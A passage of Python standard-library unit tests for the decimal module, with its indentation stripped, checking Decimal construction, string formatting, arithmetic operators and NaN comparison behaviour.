self.assertEqual(str(Decimal('1.3E4 \n')), '1.3E+4')
self.assertEqual(str(Decimal(' -7.89')), '-7.89')
self.assertEqual(str(Decimal(" 3.45679 ")), '3.45679')
# underscores
self.assertEqual(str(Decimal('1_3.3e4_0')), '1.33E+41')
self.assertEqual(str(Decimal('1_0_0_0')), '1000')
# unicode whitespace
for lead in ["", ' ', '\u00a0', '\u205f']:
for trail in ["", ' ', '\u00a0', '\u205f']:
self.assertEqual(str(Decimal(lead + '9.311E+28' + trail)),
'9.311E+28')
with localcontext() as c:
c.traps[InvalidOperation] = True
# Invalid string
self.assertRaises(InvalidOperation, Decimal, "xyz")
# Two arguments max
self.assertRaises(TypeError, Decimal, "1234", "x", "y")
# space within the numeric part
self.assertRaises(InvalidOperation, Decimal, "1\u00a02\u00a03")
self.assertRaises(InvalidOperation, Decimal, "\u00a01\u00a02\u00a0")
# unicode whitespace
self.assertRaises(InvalidOperation, Decimal, "\u00a0")
self.assertRaises(InvalidOperation, Decimal, "\u00a0\u00a0")
# embedded NUL
self.assertRaises(InvalidOperation, Decimal, "12\u00003")
# underscores don't prevent errors
self.assertRaises(InvalidOperation, Decimal, "1_2_\u00003")
@cpython_only
@requires_legacy_unicode_capi
@warnings_helper.ignore_warnings(category=DeprecationWarning)
def test_from_legacy_strings(self):
import _testcapi
Decimal = self.decimal.Decimal
context = self.decimal.Context()
s = _testcapi.unicode_legacy_string('9.999999')
self.assertEqual(str(Decimal(s)), '9.999999')
self.assertEqual(str(context.create_decimal(s)), '9.999999')
def test_explicit_from_tuples(self):
Decimal = self.decimal.Decimal
#zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(str(d), '0')
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(str(d), '-45')
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(str(d), '45.34')
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
#inf
d = Decimal( (0, (), "F") )
self.assertEqual(str(d), 'Infinity')
#wrong number of items
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1)) )
#bad sign
self.assertRaises(ValueError, Decimal, (8, (4, 3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (0., (4, 3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (Decimal(1), (4, 3, 4, 9, 1), 2))
#bad exp
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 'wrong!') )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 0.) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), '1') )
#bad coefficients
self.assertRaises(ValueError, Decimal, (1, "xyz", 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, None, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, -3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 10, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 'a', 1), 2) )
def test_explicit_from_list(self):
Decimal = self.decimal.Decimal
d = Decimal([0, [0], 0])
self.assertEqual(str(d), '0')
d = Decimal([1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25])
self.assertEqual(str(d), '-4.34913534E-17')
d = Decimal([1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25])
self.assertEqual(str(d), '-4.34913534E-17')
d = Decimal((1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25))
self.assertEqual(str(d), '-4.34913534E-17')
def test_explicit_from_bool(self):
Decimal = self.decimal.Decimal
self.assertIs(bool(Decimal(0)), False)
self.assertIs(bool(Decimal(1)), True)
self.assertEqual(Decimal(False), Decimal(0))
self.assertEqual(Decimal(True), Decimal(1))
def test_explicit_from_Decimal(self):
Decimal = self.decimal.Decimal
#positive
d = Decimal(45)
e = Decimal(d)
self.assertEqual(str(e), '45')
#very large positive
d = Decimal(500000123)
e = Decimal(d)
self.assertEqual(str(e), '500000123')
#negative
d = Decimal(-45)
e = Decimal(d)
self.assertEqual(str(e), '-45')
#zero
d = Decimal(0)
e = Decimal(d)
self.assertEqual(str(e), '0')
@requires_IEEE_754
def test_explicit_from_float(self):
Decimal = self.decimal.Decimal
r = Decimal(0.1)
self.assertEqual(type(r), Decimal)
self.assertEqual(str(r),
'0.1000000000000000055511151231257827021181583404541015625')
self.assertTrue(Decimal(float('nan')).is_qnan())
self.assertTrue(Decimal(float('inf')).is_infinite())
self.assertTrue(Decimal(float('-inf')).is_infinite())
self.assertEqual(str(Decimal(float('nan'))),
str(Decimal('NaN')))
self.assertEqual(str(Decimal(float('inf'))),
str(Decimal('Infinity')))
self.assertEqual(str(Decimal(float('-inf'))),
str(Decimal('-Infinity')))
self.assertEqual(str(Decimal(float('-0.0'))),
str(Decimal('-0')))
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(Decimal(x))) # roundtrip
def test_explicit_context_create_decimal(self):
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
Rounded = self.decimal.Rounded
nc = copy.copy(self.decimal.getcontext())
nc.prec = 3
# empty
d = Decimal()
self.assertEqual(str(d), '0')
d = nc.create_decimal()
self.assertEqual(str(d), '0')
# from None
self.assertRaises(TypeError, nc.create_decimal, None)
# from int
d = nc.create_decimal(456)
self.assertIsInstance(d, Decimal)
self.assertEqual(nc.create_decimal(45678),
nc.create_decimal('457E+2'))
# from string
d = Decimal('456789')
self.assertEqual(str(d), '456789')
d = nc.create_decimal('456789')
self.assertEqual(str(d), '4.57E+5')
# leading and trailing whitespace should result in a NaN;
# spaces are already checked in Cowlishaw's test-suite, so
# here we just check that a trailing newline results in a NaN
self.assertEqual(str(nc.create_decimal('3.14\n')), 'NaN')
# from tuples
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
d = nc.create_decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.35E-17')
# from Decimal
prevdec = Decimal(500000123)
d = Decimal(prevdec)
self.assertEqual(str(d), '500000123')
d = nc.create_decimal(prevdec)
self.assertEqual(str(d), '5.00E+8')
# more integers
nc.prec = 28
nc.traps[InvalidOperation] = True
for v in [-2**63-1, -2**63, -2**31-1, -2**31, 0,
2**31-1, 2**31, 2**63-1, 2**63]:
d = nc.create_decimal(v)
self.assertTrue(isinstance(d, Decimal))
self.assertEqual(int(d), v)
nc.prec = 3
nc.traps[Rounded] = True
self.assertRaises(Rounded, nc.create_decimal, 1234)
# from string
nc.prec = 28
self.assertEqual(str(nc.create_decimal('0E-017')), '0E-17')
self.assertEqual(str(nc.create_decimal('45')), '45')
self.assertEqual(str(nc.create_decimal('-Inf')), '-Infinity')
self.assertEqual(str(nc.create_decimal('NaN123')), 'NaN123')
# invalid arguments
self.assertRaises(InvalidOperation, nc.create_decimal, "xyz")
self.assertRaises(ValueError, nc.create_decimal, (1, "xyz", -25))
self.assertRaises(TypeError, nc.create_decimal, "1234", "5678")
# no whitespace and underscore stripping is done with this method
self.assertRaises(InvalidOperation, nc.create_decimal, " 1234")
self.assertRaises(InvalidOperation, nc.create_decimal, "12_34")
# too many NaN payload digits
nc.prec = 3
self.assertRaises(InvalidOperation, nc.create_decimal, 'NaN12345')
self.assertRaises(InvalidOperation, nc.create_decimal,
Decimal('NaN12345'))
nc.traps[InvalidOperation] = False
self.assertEqual(str(nc.create_decimal('NaN12345')), 'NaN')
self.assertTrue(nc.flags[InvalidOperation])
nc.flags[InvalidOperation] = False
self.assertEqual(str(nc.create_decimal(Decimal('NaN12345'))), 'NaN')
self.assertTrue(nc.flags[InvalidOperation])
def test_explicit_context_create_from_float(self):
Decimal = self.decimal.Decimal
nc = self.decimal.Context()
r = nc.create_decimal(0.1)
self.assertEqual(type(r), Decimal)
self.assertEqual(str(r), '0.1000000000000000055511151231')
self.assertTrue(nc.create_decimal(float('nan')).is_qnan())
self.assertTrue(nc.create_decimal(float('inf')).is_infinite())
self.assertTrue(nc.create_decimal(float('-inf')).is_infinite())
self.assertEqual(str(nc.create_decimal(float('nan'))),
str(nc.create_decimal('NaN')))
self.assertEqual(str(nc.create_decimal(float('inf'))),
str(nc.create_decimal('Infinity')))
self.assertEqual(str(nc.create_decimal(float('-inf'))),
str(nc.create_decimal('-Infinity')))
self.assertEqual(str(nc.create_decimal(float('-0.0'))),
str(nc.create_decimal('-0')))
nc.prec = 100
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(nc.create_decimal(x))) # roundtrip
def test_unicode_digits(self):
Decimal = self.decimal.Decimal
test_values = {
'\uff11': '1',
'\u0660.\u0660\u0663\u0667\u0662e-\u0663' : '0.0000372',
'-nan\u0c68\u0c6a\u0c66\u0c66' : '-NaN2400',
}
for input, expected in test_values.items():
self.assertEqual(str(Decimal(input)), expected)
class CExplicitConstructionTest(ExplicitConstructionTest):
decimal = C
class PyExplicitConstructionTest(ExplicitConstructionTest):
decimal = P
class ImplicitConstructionTest(unittest.TestCase):
'''Unit tests for Implicit Construction cases of Decimal.'''
def test_implicit_from_None(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + None', locals())
def test_implicit_from_int(self):
Decimal = self.decimal.Decimal
#normal
self.assertEqual(str(Decimal(5) + 45), '50')
#exceeding precision
self.assertEqual(Decimal(5) + 123456789000, Decimal(123456789000))
def test_implicit_from_string(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + "3"', locals())
def test_implicit_from_float(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + 2.2', locals())
def test_implicit_from_Decimal(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(5) + Decimal(45), Decimal(50))
def test_rop(self):
Decimal = self.decimal.Decimal
# Allow other classes to be trained to interact with Decimals
class E:
def __divmod__(self, other):
return 'divmod ' + str(other)
def __rdivmod__(self, other):
return str(other) + ' rdivmod'
def __lt__(self, other):
return 'lt ' + str(other)
def __gt__(self, other):
return 'gt ' + str(other)
def __le__(self, other):
return 'le ' + str(other)
def __ge__(self, other):
return 'ge ' + str(other)
def __eq__(self, other):
return 'eq ' + str(other)
def __ne__(self, other):
return 'ne ' + str(other)
self.assertEqual(divmod(E(), Decimal(10)), 'divmod 10')
self.assertEqual(divmod(Decimal(10), E()), '10 rdivmod')
self.assertEqual(eval('Decimal(10) < E()'), 'gt 10')
self.assertEqual(eval('Decimal(10) > E()'), 'lt 10')
self.assertEqual(eval('Decimal(10) <= E()'), 'ge 10')
self.assertEqual(eval('Decimal(10) >= E()'), 'le 10')
self.assertEqual(eval('Decimal(10) == E()'), 'eq 10')
self.assertEqual(eval('Decimal(10) != E()'), 'ne 10')
# insert operator methods and then exercise them
oplist = [
('+', '__add__', '__radd__'),
('-', '__sub__', '__rsub__'),
('*', '__mul__', '__rmul__'),
('/', '__truediv__', '__rtruediv__'),
('%', '__mod__', '__rmod__'),
('//', '__floordiv__', '__rfloordiv__'),
('**', '__pow__', '__rpow__')
]
for sym, lop, rop in oplist:
setattr(E, lop, lambda self, other: 'str' + lop + str(other))
setattr(E, rop, lambda self, other: str(other) + rop + 'str')
self.assertEqual(eval('E()' + sym + 'Decimal(10)'),
'str' + lop + '10')
self.assertEqual(eval('Decimal(10)' + sym + 'E()'),
'10' + rop + 'str')
class CImplicitConstructionTest(ImplicitConstructionTest):
decimal = C
class PyImplicitConstructionTest(ImplicitConstructionTest):
decimal = P
class FormatTest(unittest.TestCase):
'''Unit tests for the format function.'''
def test_formatting(self):
Decimal = self.decimal.Decimal
# triples giving a format, a Decimal, and the expected result
test_values = [
('e', '0E-15', '0e-15'),
('e', '2.3E-15', '2.3e-15'),
('e', '2.30E+2', '2.30e+2'), # preserve significant zeros
('e', '2.30000E-15', '2.30000e-15'),
('e', '1.23456789123456789e40', '1.23456789123456789e+40'),
('e', '1.5', '1.5e+0'),
('e', '0.15', '1.5e-1'),
('e', '0.015', '1.5e-2'),
('e', '0.0000000000015', '1.5e-12'),
('e', '15.0', '1.50e+1'),
('e', '-15', '-1.5e+1'),
('e', '0', '0e+0'),
('e', '0E1', '0e+1'),
('e', '0.0', '0e-1'),
('e', '0.00', '0e-2'),
('.6e', '0E-15', '0.000000e-9'),
('.6e', '0', '0.000000e+6'),
('.6e', '9.999999', '9.999999e+0'),
('.6e', '9.9999999', '1.000000e+1'),
('.6e', '-1.23e5', '-1.230000e+5'),
('.6e', '1.23456789e-3', '1.234568e-3'),
('f', '0', '0'),
('f', '0.0', '0.0'),
('f', '0E-2', '0.00'),
('f', '0.00E-8', '0.0000000000'),
('f', '0E1', '0'), # loses exponent information
('f', '3.2E1', '32'),
('f', '3.2E2', '320'),
('f', '3.20E2', '320'),
('f', '3.200E2', '320.0'),
('f', '3.2E-6', '0.0000032'),
('.6f', '0E-15', '0.000000'), # all zeros treated equally
('.6f', '0E1', '0.000000'),
('.6f', '0', '0.000000'),
('.0f', '0', '0'), # no decimal point
('.0f', '0e-2', '0'),
('.0f', '3.14159265', '3'),
('.1f', '3.14159265', '3.1'),
('.4f', '3.14159265', '3.1416'),
('.6f', '3.14159265', '3.141593'),
('.7f', '3.14159265', '3.1415926'), # round-half-even!
('.8f', '3.14159265', '3.14159265'),
('.9f', '3.14159265', '3.141592650'),
('g', '0', '0'),
('g', '0.0', '0.0'),
('g', '0E1', '0e+1'),
('G', '0E1', '0E+1'),
('g', '0E-5', '0.00000'),
('g', '0E-6', '0.000000'),
('g', '0E-7', '0e-7'),
('g', '-0E2', '-0e+2'),
('.0g', '3.14159265', '3'), # 0 sig fig -> 1 sig fig
('.0n', '3.14159265', '3'), # same for 'n'
('.1g', '3.14159265', '3'),
('.2g', '3.14159265', '3.1'),
('.5g', '3.14159265', '3.1416'),
('.7g', '3.14159265', '3.141593'),
('.8g', '3.14159265', '3.1415926'), # round-half-even!
('.9g', '3.14159265', '3.14159265'),
('.10g', '3.14159265', '3.14159265'), # don't pad
('%', '0E1', '0%'),
('%', '0E0', '0%'),
('%', '0E-1', '0%'),
('%', '0E-2', '0%'),
('%', '0E-3', '0.0%'),
('%', '0E-4', '0.00%'),
('.3%', '0', '0.000%'), # all zeros treated equally
('.3%', '0E10', '0.000%'),
('.3%', '0E-10', '0.000%'),
('.3%', '2.34', '234.000%'),
('.3%', '1.234567', '123.457%'),
('.0%', '1.23', '123%'),
('e', 'NaN', 'NaN'),
('f', '-NaN123', '-NaN123'),
('+g', 'NaN456', '+NaN456'),
('.3e', 'Inf', 'Infinity'),
('.16f', '-Inf', '-Infinity'),
('.0g', '-sNaN', '-sNaN'),
('', '1.00', '1.00'),
# test alignment and padding
('6', '123', ' 123'),
('<6', '123', '123 '),
('>6', '123', ' 123'),
('^6', '123', ' 123 '),
('=+6', '123', '+ 123'),
('#<10', 'NaN', 'NaN#######'),
('#<10', '-4.3', '-4.3######'),
('#<+10', '0.0130', '+0.0130###'),
('#< 10', '0.0130', ' 0.0130###'),
('@>10', '-Inf', '@-Infinity'),
('#>5', '-Inf', '-Infinity'),
('?^5', '123', '?123?'),
('%^6', '123', '%123%%'),
(' ^6', '-45.6', '-45.6 '),
('/=10', '-45.6', '-/////45.6'),
('/=+10', '45.6', '+/////45.6'),
('/= 10', '45.6', ' /////45.6'),
('\x00=10', '-inf', '-\x00Infinity'),
('\x00^16', '-inf', '\x00\x00\x00-Infinity\x00\x00\x00\x00'),
('\x00>10', '1.2345', '\x00\x00\x00\x001.2345'),
('\x00<10', '1.2345', '1.2345\x00\x00\x00\x00'),
# thousands separator
(',', '1234567', '1,234,567'),
(',', '123456', '123,456'),
(',', '12345', '12,345'),
(',', '1234', '1,234'),
(',', '123', '123'),
(',', '12', '12'),
(',', '1', '1'),
(',', '0', '0'),
(',', '-1234567', '-1,234,567'),
(',', '-123456', '-123,456'),
('7,', '123456', '123,456'),
('8,', '123456', ' 123,456'),
('08,', '123456', '0,123,456'), # special case: extra 0 needed
('+08,', '123456', '+123,456'), # but not if there's a sign
(' 08,', '123456', ' 123,456'),
('08,', '-123456', '-123,456'),
('+09,', '123456', '+0,123,456'),
# ... with fractional part...
('07,', '1234.56', '1,234.56'),
('08,', '1234.56', '1,234.56'),
('09,', '1234.56', '01,234.56'),
('010,', '1234.56', '001,234.56'),
('011,', '1234.56', '0,001,234.56'),
('012,', '1234.56', '0,001,234.56'),
('08,.1f', '1234.5', '01,234.5'),
# no thousands separators in fraction part
(',', '1.23456789', '1.23456789'),
(',%', '123.456789', '12,345.6789%'),
(',e', '123456', '1.23456e+5'),
(',E', '123456', '1.23456E+5'),
# issue 6850
('a=-7.0', '0.12345', 'aaaa0.1'),
# issue 22090
('<^+15.20%', 'inf', '<<+Infinity%<<<'),
('\x07>,%', 'sNaN1234567', 'sNaN1234567%'),
('=10.10%', 'NaN123', ' NaN123%'),
]
for fmt, d, result in test_values:
self.assertEqual(format(Decimal(d), fmt), result)
# bytes format argument
self.assertRaises(TypeError, Decimal(1).__format__, b'-020')
def test_n_format(self):
Decimal = self.decimal.Decimal
try:
from locale import CHAR_MAX
except ImportError:
self.skipTest('locale.CHAR_MAX not available')
def make_grouping(lst):
return ''.join([chr(x) for x in lst]) if self.decimal == C else lst
def get_fmt(x, override=None, fmt='n'):
if self.decimal == C:
return Decimal(x).__format__(fmt, override)
else:
return Decimal(x).__format__(fmt, _localeconv=override)
# Set up some localeconv-like dictionaries
en_US = {
'decimal_point' : '.',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : ','
}
fr_FR = {
'decimal_point' : ',',
'grouping' : make_grouping([CHAR_MAX]),
'thousands_sep' : ''
}
ru_RU = {
'decimal_point' : ',',
'grouping': make_grouping([3, 3, 0]),
'thousands_sep' : ' '
}
crazy = {
'decimal_point' : '&',
'grouping': make_grouping([1, 4, 2, CHAR_MAX]),
'thousands_sep' : '-'
}
dotsep_wide = {
'decimal_point' : b'\xc2\xbf'.decode('utf-8'),
'grouping': make_grouping([3, 3, 0]),
'thousands_sep' : b'\xc2\xb4'.decode('utf-8')
}
self.assertEqual(get_fmt(Decimal('12.7'), en_US), '12.7')
self.assertEqual(get_fmt(Decimal('12.7'), fr_FR), '12,7')
self.assertEqual(get_fmt(Decimal('12.7'), ru_RU), '12,7')
self.assertEqual(get_fmt(Decimal('12.7'), crazy), '1-2&7')
self.assertEqual(get_fmt(123456789, en_US), '123,456,789')
self.assertEqual(get_fmt(123456789, fr_FR), '123456789')
self.assertEqual(get_fmt(123456789, ru_RU), '123 456 789')
self.assertEqual(get_fmt(1234567890123, crazy), '123456-78-9012-3')
self.assertEqual(get_fmt(123456789, en_US, '.6n'), '1.23457e+8')
self.assertEqual(get_fmt(123456789, fr_FR, '.6n'), '1,23457e+8')
self.assertEqual(get_fmt(123456789, ru_RU, '.6n'), '1,23457e+8')
self.assertEqual(get_fmt(123456789, crazy, '.6n'), '1&23457e+8')
# zero padding
self.assertEqual(get_fmt(1234, fr_FR, '03n'), '1234')
self.assertEqual(get_fmt(1234, fr_FR, '04n'), '1234')
self.assertEqual(get_fmt(1234, fr_FR, '05n'), '01234')
self.assertEqual(get_fmt(1234, fr_FR, '06n'), '001234')
self.assertEqual(get_fmt(12345, en_US, '05n'), '12,345')
self.assertEqual(get_fmt(12345, en_US, '06n'), '12,345')
self.assertEqual(get_fmt(12345, en_US, '07n'), '012,345')
self.assertEqual(get_fmt(12345, en_US, '08n'), '0,012,345')
self.assertEqual(get_fmt(12345, en_US, '09n'), '0,012,345')
self.assertEqual(get_fmt(12345, en_US, '010n'), '00,012,345')
self.assertEqual(get_fmt(123456, crazy, '06n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '07n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '08n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '09n'), '01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '010n'), '0-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '011n'), '0-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '012n'), '00-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '013n'), '000-01-2345-6')
# wide char separator and decimal point
self.assertEqual(get_fmt(Decimal('-1.5'), dotsep_wide, '020n'),
'-0\u00b4000\u00b4000\u00b4000\u00b4001\u00bf5')
@run_with_locale('LC_ALL', 'ps_AF')
def test_wide_char_separator_decimal_point(self):
# locale with wide char separator and decimal point
Decimal = self.decimal.Decimal
decimal_point = locale.localeconv()['decimal_point']
thousands_sep = locale.localeconv()['thousands_sep']
if decimal_point != '\u066b':
self.skipTest('inappropriate decimal point separator '
'({!a} not {!a})'.format(decimal_point, '\u066b'))
if thousands_sep != '\u066c':
self.skipTest('inappropriate thousands separator '
'({!a} not {!a})'.format(thousands_sep, '\u066c'))
self.assertEqual(format(Decimal('100000000.123'), 'n'),
'100\u066c000\u066c000\u066b123')
def test_decimal_from_float_argument_type(self):
class A(self.decimal.Decimal):
def __init__(self, a):
self.a_type = type(a)
a = A.from_float(42.5)
self.assertEqual(self.decimal.Decimal, a.a_type)
a = A.from_float(42)
self.assertEqual(self.decimal.Decimal, a.a_type)
class CFormatTest(FormatTest):
decimal = C
class PyFormatTest(FormatTest):
decimal = P
class ArithmeticOperatorsTest(unittest.TestCase):
'''Unit tests for all arithmetic operators, binary and unary.'''
def test_addition(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1+d2, Decimal('11.1'))
self.assertEqual(d2+d1, Decimal('11.1'))
#with other type, left
c = d1 + 5
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 + d1
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 += d2
self.assertEqual(d1, Decimal('11.1'))
#inline with other type
d1 += 5
self.assertEqual(d1, Decimal('16.1'))
def test_subtraction(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1-d2, Decimal('-33.3'))
self.assertEqual(d2-d1, Decimal('33.3'))
#with other type, left
c = d1 - 5
self.assertEqual(c, Decimal('-16.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 - d1
self.assertEqual(c, Decimal('16.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 -= d2
self.assertEqual(d1, Decimal('-33.3'))
#inline with other type
d1 -= 5
self.assertEqual(d1, Decimal('-38.3'))
def test_multiplication(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-5')
d2 = Decimal('3')
#two Decimals
self.assertEqual(d1*d2, Decimal('-15'))
self.assertEqual(d2*d1, Decimal('-15'))
#with other type, left
c = d1 * 5
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 * d1
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 *= d2
self.assertEqual(d1, Decimal('-15'))
#inline with other type
d1 *= 5
self.assertEqual(d1, Decimal('-75'))
def test_division(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1/d2, Decimal('-2.5'))
self.assertEqual(d2/d1, Decimal('-0.4'))
#with other type, left
c = d1 / 4
self.assertEqual(c, Decimal('-1.25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 4 / d1
self.assertEqual(c, Decimal('-0.8'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 /= d2
self.assertEqual(d1, Decimal('-2.5'))
#inline with other type
d1 /= 4
self.assertEqual(d1, Decimal('-0.625'))
def test_floor_division(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1//d2, Decimal('2'))
self.assertEqual(d2//d1, Decimal('0'))
#with other type, left
c = d1 // 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 // d1
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 //= d2
self.assertEqual(d1, Decimal('2'))
#inline with other type
d1 //= 2
self.assertEqual(d1, Decimal('1'))
def test_powering(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1**d2, Decimal('25'))
self.assertEqual(d2**d1, Decimal('32'))
#with other type, left
c = d1 ** 4
self.assertEqual(c, Decimal('625'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 ** d1
self.assertEqual(c, Decimal('16807'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 **= d2
self.assertEqual(d1, Decimal('25'))
#inline with other type
d1 **= 4
self.assertEqual(d1, Decimal('390625'))
def test_module(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1%d2, Decimal('1'))
self.assertEqual(d2%d1, Decimal('2'))
#with other type, left
c = d1 % 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 % d1
self.assertEqual(c, Decimal('2'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 %= d2
self.assertEqual(d1, Decimal('1'))
#inline with other type
d1 %= 4
self.assertEqual(d1, Decimal('1'))
def test_floor_div_module(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
(p, q) = divmod(d1, d2)
self.assertEqual(p, Decimal('2'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, left
(p, q) = divmod(d1, 4)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, right
(p, q) = divmod(7, d1)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('2'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
def test_unary_operators(self):
Decimal = self.decimal.Decimal
self.assertEqual(+Decimal(45), Decimal(+45)) # +
self.assertEqual(-Decimal(45), Decimal(-45)) # -
self.assertEqual(abs(Decimal(45)), abs(Decimal(-45))) # abs
def test_nan_comparisons(self):
# comparisons involving signaling nans signal InvalidOperation
# order comparisons (<, <=, >, >=) involving only quiet nans
# also signal InvalidOperation
# equality comparisons (==, !=) involving only quiet nans
# don't signal, but return False or True respectively.
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
localcontext = self.decimal.localcontext
n = Decimal('NaN')
s = Decimal('sNaN')
i = Decimal('Inf')
f = Decimal('2')
qnan_pairs = (n, n), (n, i), (i, n), (n, f), (f, n)
snan_pairs = (s, n), (n, s), (s, i), (i, s), (s, f), (f, s), (s, s)
order_ops = operator.lt, operator.le, operator.gt, operator.ge
equality_ops = operator.eq, operator.ne
# results when InvalidOperation is not trapped
for x, y in qnan_pairs + snan_pairs:
for op in order_ops + equality_ops:
got = op(x, y)
expected = True if op is operator.ne else False
self.assertIs(expected, got,
"expected {0!r} for operator.{1}({2!r}, {3!r}); "
"got {4!r}".format(
expected, op.__name__, x, y, got))
# repeat the above, but this time trap the InvalidOperation
with localcontext() as ctx:
ctx.traps[InvalidOperation] = 1
for x, y in qnan_pairs:
for op in equality_ops:
got = op(x, y)
expected = True if op is operator.ne else False
self.assertIs(expected, got,
"expected {0!r} for "
"operator.{1}({2!r}, {3!r}); "
"got {4!r}".format(
expected, op.__name__, x, y, got))
for x, y in snan_pairs:
for op in equality_ops:
self.assertRaises(InvalidOperation, operator.eq, x, y)
self.assertRaises(InvalidOperation, operator.ne, x, y)
for x, y in qnan_pairs + snan_pairs:
for op in order_ops:
self.assertRaises(InvalidOperation, op, x, y)
def test_copy_sign(self):
Decimal = self.decimal.Decimal
d = Decimal(1).copy_sign(Decimal(-2))
self.assertEqual(Decimal(1).copy_sign(-2), d)
self.assertRaises(TypeError, Decimal(1).copy_sign, '-2')
class CArithmeticOperatorsTest(ArithmeticOperatorsTest):
decimal = C
class PyArithmeticOperatorsTest(ArithmeticOperatorsTest):
decimal = P
# The following are two functions used to test threading in the next class
def thfunc1(cls):
Decimal = cls.decimal.Decimal
InvalidOperation = cls.decimal.InvalidOperation
DivisionByZero = cls.decimal.DivisionByZero
Overflow = cls.decimal.Overflow
Underflow = cls.decimal.Underflow
Inexact = cls.decimal.Inexact
getcontext = cls.decimal.getcontext
localcontext = cls.decimal.localcontext
d1 = Decimal(1)
d3 = Decimal(3)
test1 = d1/d3
cls.finish1.set()
cls.synchro.wait()
test2 = d1/d3
with localcontext() as c2:
cls.assertTrue(c2.flags[Inexact])
cls.assertRaises(DivisionByZero, c2.divide, d1, 0)
cls.assertTrue(c2.flags[DivisionByZero])
with localcontext() as c3:
cls.assertTrue(c3.flags[Inexact])
cls.assertTrue(c3.flags[DivisionByZero])
cls.assertRaises(InvalidOperation, c3.compare, d1, Decimal('sNaN'))
cls.assertTrue(c3.flags[InvalidOperation])
del c3
cls.assertFalse(c2.flags[InvalidOperation])
del c2
cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
cls.assertEqual(test2, Decimal('0.333333333333333333333333'))
c1 = getcontext()
cls.assertTrue(c1.flags[Inexact])
for sig in Overflow, Underflow, DivisionByZero, InvalidOperation:
cls.assertFalse(c1.flags[sig])
def thfunc2(cls):
Decimal = cls.decimal.Decimal
InvalidOperation = cls.decimal.InvalidOperation
